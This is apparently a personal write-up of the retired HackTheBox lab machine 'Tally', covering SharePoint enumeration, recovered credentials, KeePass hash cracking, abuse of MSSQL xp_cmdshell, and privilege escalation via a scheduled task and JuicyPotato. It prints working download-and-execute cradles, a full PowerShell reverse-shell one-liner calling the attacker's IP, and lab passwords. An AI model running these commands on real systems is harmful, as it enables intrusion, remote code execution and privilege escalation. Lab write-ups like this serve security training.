RingZero CTF - Forensics - Who am I part 2

HacktheBox - Tally - Retired

Recon

Let's use threader3000 for our recon scan. It's a threaded scanner written in python that does a super quick up/down scan on all TCP ports, then suggests a nmap scan based on the results. It will automatically save the nmap scan results as XML, then we can convert it to HTML

xsltproc tally.htb/tally.htb.xml -o ./tally.html

There are a lot of open ports on this box

21,80,81,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670

Looks like this is a windows box with smb, SQL, http and a bunch of RPC ports.

Let's start with checking out smb to see if we can get any info out it.

smbclient -L 10.10.10.59

Nope nothing open to anonymous users.

What about the ftp?

Same story nothing to anonymous users.

According to our nmap output it looks like port 80 is a sharepoint site, let's check it out next.

It does look like a sharepoint site.

The only thing we can do is a login Let's try just admin/admin

Didn't lets us in but we captured this in burp

There is some base64 here in the authorization field.

NTLMSSP.........`...t.t.x.......@... . .@.......J...............a.d.m.i.n.W.O.R.K.S.T.A.T.I.O.N.þöp.EoMõEäHØÁ(u`}.S} ÖqÞ$Lá}"ö.ûÔ+Ø.'ârÔ.........¸(.Þ£Ö.¿l1/2¶.kl....... .T.A.L.L.Y... .T.A.L.L.Y... .T.A.L.L.Y... .T.A.L.L.Y.....n¬.ûÞ£Ö.....

Ok. 

Let's see if we can find anything else available to us on this port. Let's use a dirb to scan for any other directories or files we might have access to.

The folks over at BishopFox have given us a brute force tool that is tooled for Sharepoint so let's download the perl script and extensions file

https://resources.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/

perl SharePointURLBrute\ v1.1.pl -a "http://tally.htb" -e SharePoint-UrlExtensions-18Mar2012.txt

Starting search for common SharePoint Pages Start Time: Fri Oct 16 13:25:48 2020 FOUND: http://tally.htb/_catalogs/masterpage/Forms/AllItems.aspx FOUND: http://tally.htb/_catalogs/wp/Forms/AllItems.aspx FOUND: http://tally.htb/_layouts/AreaNavigationSettings.aspx FOUND: http://tally.htb/_Layouts/AreaTemplateSettings.aspx FOUND: http://tally.htb/_Layouts/AreaWelcomePage.aspx FOUND: http://tally.htb/_Layouts/ChangeSiteMasterPage.aspx FOUND: http://tally.htb/_layouts/MyInfo.aspx FOUND: http://tally.htb/_layouts/MyPage.aspx FOUND: http://tally.htb/_layouts/PageSettings.aspx FOUND: http://tally.htb/_layouts/policy.aspx FOUND: http://tally.htb/_layouts/policyconfig.aspx FOUND: http://tally.htb/_layouts/policycts.aspx FOUND: http://tally.htb/_layouts/Policylist.aspx FOUND: http://tally.htb/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage FOUND: http://tally.htb/_layouts/SiteDirectorySettings.aspx FOUND: http://tally.htb/_layouts/sitemanager.aspx FOUND: http://tally.htb/_Layouts/SiteManager.aspx?lro=all FOUND: http://tally.htb/_vti_bin/alerts.asmx FOUND: http://tally.htb/_vti_bin/dspsts.asmx FOUND: http://tally.htb/_vti_bin/forms.asmx FOUND: http://tally.htb/_vti_bin/Lists.asmx FOUND: http://tally.htb/_vti_bin/people.asmx FOUND: http://tally.htb/_vti_bin/Permissions.asmx FOUND: http://tally.htb/_vti_bin/search.asmx FOUND: http://tally.htb/_vti_bin/UserGroup.asmx FOUND: http://tally.htb/_vti_bin/versions.asmx FOUND: http://tally.htb/_vti_bin/Views.asmx FOUND: http://tally.htb/_vti_bin/webpartpages.asmx FOUND: http://tally.htb/_vti_bin/webs.asmx FOUND: http://tally.htb/_vti_bin/SharepointEmailWS.asmx FOUND: http://tally.htb/_vti_bin/spsearch.asmx FOUND: http://tally.htb/_vti_bin/WebPartPages.asmx FOUND: http://tally.htb/default.aspx FOUND: http://tally.htb/shared documents/forms/allitems.aspx Search Complete Total # of SP Admin URLs Found: 34 Finish Time: Fri Oct 16 13:28:01 2020

The last result here is interesting

FOUND: http://tally.htb/shared documents/forms/allitems.aspx

We can use online viewer to open it open to see the details of the ftp-details.docx

https://products.groupdocs.app/viewer/view?FolderName=c4107c6c-5b7f-4eae-80ed-c31027ee84fa&FileName=ftp-details.docx

 UTDRSCH53c"$6hys

So we have a password but no username.

Luckily another page gives us some more info

http://tally.htb/SitePages/FinanceTeam.aspx

Alright we got a username now to ftp_users

Let's use filezilla to download all the files here in case there is some more data in here.

There are some todo notes in the IT users folder Sarah and Tim

Sarah

done install Sharepoint, replace Orchard CMS to do uninstall SQL Server 2016

Tim

To do: Remove migration folder Set secure share permissions encrypted share creds: password in keepass

Password in keepass? That sounds promising.

In his folder we do see a tim.kdbx file which could be a keepass database for Tim.

Let's transfer this over to a windows box since keepass is a windows program.

If we try to open the kdbx we get this.

We need a password….

Let's see if we can use johntheRipper to get it

Here is blog that describes the steps

https://tzusec.com/tag/keepass2john/

First we need to format this in a way that john likes we can use the builtin app keepass2john

/usr/sbin/keepass2john  ./tim.kdbx

Which gives us this output that we can save out to a file called keepasshash

/usr/sbin/keepass2john  ./tim.kdbx tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9 d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea* 3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90 aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc 1cd7da circusmonkey404@kali:~/Desktop/HTB/tally$ /usr/sbin/keepass2john  ./tim.kdbx  > keepasshash

sudo john --wordlist=/usr/share/wordlists/rockyou.txt keepasshash

It should only take a minute or two to get the password out.

simplementeyo

There were a couple of password in the database but one that jumps out

Tally Acct Share

Finance Acc0unting

Let's bounce back to smb now that we might have some creds that should work for smb

smbclient -U "Finance" -L \\\\tally.htb

There is an ACCT share and some other admin shares, Let's try the admin shares first just in case.

Nope.

Okay what about the ACCT Share

Some folders here to check out.

Under zz_Archived/SQL we can find this file conn-info.txt

old server details db: sa pass: YE%TJC%&HYbe5Nw have changed for tally

Looks like what used to be the SA password for sql, but it says they have been changed..

Another interesting finding that probably won't help us own this box…. But apparently they have a spreadsheet of all their customers along with their credit card numbers…. I  don't think these guys are PCI Compliant.

Let's keep poking around..

In the acct/zz_Migration/Binaries/New folder/ we can see a bunch of executables and one with an interesting name of tester.exe.

Let's grab a copy and see what it is.

Let's try running strings against it to see if we can get it to leak out what it is or what it is doing..

strings ./tester.exe

Looks like we have another possible SA password

GWE3V65#6KFH93@4GWTG2G

Let's use a tool called mssql-cli

https://github.com/dbcli/mssql-cli

mssql-cli -S tally.htb -U sa -P GWE3V65#6KFH93@4GWTG2G

Let's first see what databases are on the server.

select name FROM master.dbo.sysdatabases;

+--------+ | name   | |--------| | master | | tempdb | | model  | | msdb   | +--------+ (4 rows affected) master> ;                                                                                                                               Time: 0.263s Commands completed successfully

Ok we have master, tempdb, model and msdb

Let's see about tables in these databases

 select * From  master.Information_schema.tables;

There are some tables in master, nothing in tempdb or model… but a whole lot in msdb ( which is expected since it's the workhorse db for mssql)

We can find the next command on this site which is a good resource here for looking at mssql

https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

It even gives a pro tip, that whoever is running MSSQL most likely has SeImpersonatePrivlege rights, and is probably vulnerable to a Juicy-Potato attack.

select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;

Time: 0.973s +-----------------------------------------+--------------------------+-----------------------------------------------------------------> | login                                   | login_type               | password_hash                                                   > |-----------------------------------------+--------------------------+-----------------------------------------------------------------> | ##MS_AgentSigningCertificate##          | CERTIFICATE_MAPPED_LOGIN | NULL                                                            > | ##MS_PolicyEventProcessingLogin##       | SQL_LOGIN                | 0x0200FED454A573B2B9C22F7EB4C935ED6179BDFA683198E434D863C5ED7477> | ##MS_PolicySigningCertificate##         | CERTIFICATE_MAPPED_LOGIN | NULL                                                            > | ##MS_PolicyTsqlExecutionLogin##         | SQL_LOGIN                | 0x0200DE379F4D9E833E9D4EA1984B69137BE6AEF4FF126C2A2C4A436D2DCDAB> | ##MS_SmoExtendedSigningCertificate##    | CERTIFICATE_MAPPED_LOGIN | NULL                                                            > | ##MS_SQLAuthenticatorCertificate##      | CERTIFICATE_MAPPED_LOGIN | NULL                                                            > | ##MS_SQLReplicationSigningCertificate## | CERTIFICATE_MAPPED_LOGIN | NULL                                                            > | ##MS_SQLResourceSigningCertificate##    | CERTIFICATE_MAPPED_LOGIN | NULL                                                            > | NT AUTHORITY\SYSTEM                     | WINDOWS_LOGIN            | NULL                                                            > | NT SERVICE\MSSQLSERVER                  | WINDOWS_LOGIN            | NULL                                                            > | NT SERVICE\SQLSERVERAGENT               | WINDOWS_LOGIN            | NULL                                                            > | NT SERVICE\SQLTELEMETRY                 | WINDOWS_LOGIN            | NULL                                                            > | NT SERVICE\SQLWriter                    | WINDOWS_LOGIN            | NULL                                                            > | NT SERVICE\Winmgmt                      | WINDOWS_LOGIN            | NULL                                                            > | sa                                      | SQL_LOGIN                | 0x020077CC3CBB58A009A68DB558EB136EF1EB8CBCBFD2654A2AFB1F682F3020> | WIN-A1D9PN09GFO\Sarah                   | WINDOWS_LOGIN            | NULL                                                            > +-----------------------------------------+--------------------------+----------------------------------------------------------------->

There is a hash here for the sa account but we already know that password, it looks like sarah has a login here to sql also but no hash stored.

Poking around in the DBs we can't really find anything interesting.

Exploit

However since we have SA on this DB we might be able to use it to run some commands on the box.

https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15

xp_cmdshell { 'command_string' } [ , no_output ]

Looks like xp_cmdshell is not enabled…. Guess what we are the sa and we can do whatever we want. Let's enable it. :)

https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver15

-- To allow advanced options to be changed.  EXECUTE sp_configure 'show advanced options', 1;  GO  -- To update the currently configured value for advanced options.  RECONFIGURE;  GO  -- To enable the feature.  EXECUTE sp_configure 'xp_cmdshell', 1;  GO  -- To update the currently configured value for this feature.  RECONFIGURE;  GO

Much better

Let's get a real shell 

We'll use Nishang's Invoke-PowerShellTcp.ps1

First download the file or clone the git if you don't already have it.

https://github.com/samratashok/nishang

Copy Invoke-PowershellTCP.ps1 to a folder you want to serve it from.

Add this line to the bottom of scripts so it will run after download.( with your VPN IP and choice of port though)

Invoke-PowerShellTCP -Reverse -IPAddress 10.10.14.16 -Port 5555

Next we need to set up a listener on our kali box

Nc -lnvp 5555

Then on our SA connection to tally we will put in

xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.16:9090/Invoke-PowerShellTcp.ps1')"

** There is a process  here re-disabling xm_cmdshell so you might need to redo that part if you are going too slow*******

With any luck we should get a powershell reverse shell back now.

And we can get our user.txt now

Now we just need to escalate, remember earlier the tip the other site gave us about our users maybe having SeImpersonatePrivleges??

Lets' check

Yup

Ok so we should be able to use a potato priv esc here.

But let's poke around and see if there is another path.

Look at these two files. SPBestWarmUp.ps1 & SPBestWarmUp.xml

PS C:\users\Sarah\Desktop> type SPBestWarmup.xml <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">   <Triggers>     <CalendarTrigger>       <Repetition>         <Interval>PT1H</Interval>         <Duration>P1D</Duration>         <StopAtDurationEnd>false</StopAtDurationEnd>       </Repetition>       <StartBoundary>2017-01-25T01:00:00</StartBoundary>       <Enabled>true</Enabled>       <ScheduleByDay>         <DaysInterval>1</DaysInterval>       </ScheduleByDay>     </CalendarTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-IIS-IISReset'] and EventID=3201]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5074]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5075]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5076]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5077]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5078]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5079]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5080]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5081]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5117]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <EventTrigger>       <Enabled>true</Enabled>       <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5186]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>       <Delay>PT1M</Delay>     </EventTrigger>     <BootTrigger>       <Enabled>true</Enabled>       <Delay>PT5M</Delay>     </BootTrigger>   </Triggers>   <Principals>     <Principal id="Author">       <UserId>TALLY\Administrator</UserId>       <LogonType>Password</LogonType>       <RunLevel>HighestAvailable</RunLevel>     </Principal>   </Principals>   <Settings>     <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>     <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>     <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>     <AllowHardTerminate>true</AllowHardTerminate>     <StartWhenAvailable>false</StartWhenAvailable>     <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>     <IdleSettings>       <StopOnIdleEnd>true</StopOnIdleEnd>       <RestartOnIdle>false</RestartOnIdle>     </IdleSettings>     <AllowStartOnDemand>true</AllowStartOnDemand>     <Enabled>true</Enabled>     <Hidden>false</Hidden>     <RunOnlyIfIdle>false</RunOnlyIfIdle>     <WakeToRun>false</WakeToRun>     <ExecutionTimeLimit>P3D</ExecutionTimeLimit>     <Priority>7</Priority>   </Settings>   <Actions Context="Author">     <Exec>       <Command>PowerShell.exe</Command>       <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments>       <WorkingDirectory>C:\Users\Sarah\Desktop</WorkingDirectory>     </Exec>   </Actions> </Task>

This sure looks like the XML for a scheduled task…. And even better it looks like one that runs as administrator

And it's just running this powershell file on Sarah's Desktop

So If we overwrite the file it will run what we want it to run as Administrator…

Let's try it.

We had good luck with our first reverse powershell, let's just modify it to use a different port and overwrite the file with it. We just need to rename it to something else ( I just added -Admin to the end) and modify the last line to invoke to be a different port that we are already using.

Invoke-PowerShellTCP -Reverse -IPAddress 10.10.14.16 -Port 5666

Let's start a new listener for that port.

nc -lnvp 5666

Then overwrite the ps1 on her desktop with a new ps1

iex(new-object net.webclient).downloadstring('http://10.10.14.16:9090/Invoke-PowerShellTcp-Admin.ps1')

Then we can use echo to overwrite the file on Tally

echo "iex(new-object net.webclient).downloadstring('http://10.10.14.16:9090/Invoke-PowerShellTcp-Admin.ps1')" > SPBestWarmUp.ps1

Now we just need to wait for the task to fire.

Here comes the bad news with this method…. 

^^^ that means it only runs once an hour….. Which really sucks for me because I missed a quotation mark the first time I tried this and had to wait almost two full hours…..

Theoretically this should work if the administrator account is running this scheduled task.. I'm done waiting for it.. Let's potato this bad boy

Let's use the same path we used on bounty

Grab a copy of juicy potato

https://github.com/ohpe/juicy-potato/releases

Use certutil to download it to tally

certutil.exe -urlcache -f http://10.10.14.16:9090/JuicyPotato.exe JuicyPotato.exe

Create a bat file for a reverse shell I used a power shell on here

I created it on kali and used certutil and updog to download it to tally

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.16',5666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Then just ran Juicy Potato using the defaults and pointing it to rshell.bat

C:\temp\JuicyPotato.exe -l 1337 -p C:\temp\RShell.bat -t *

And there we go we got our root flag.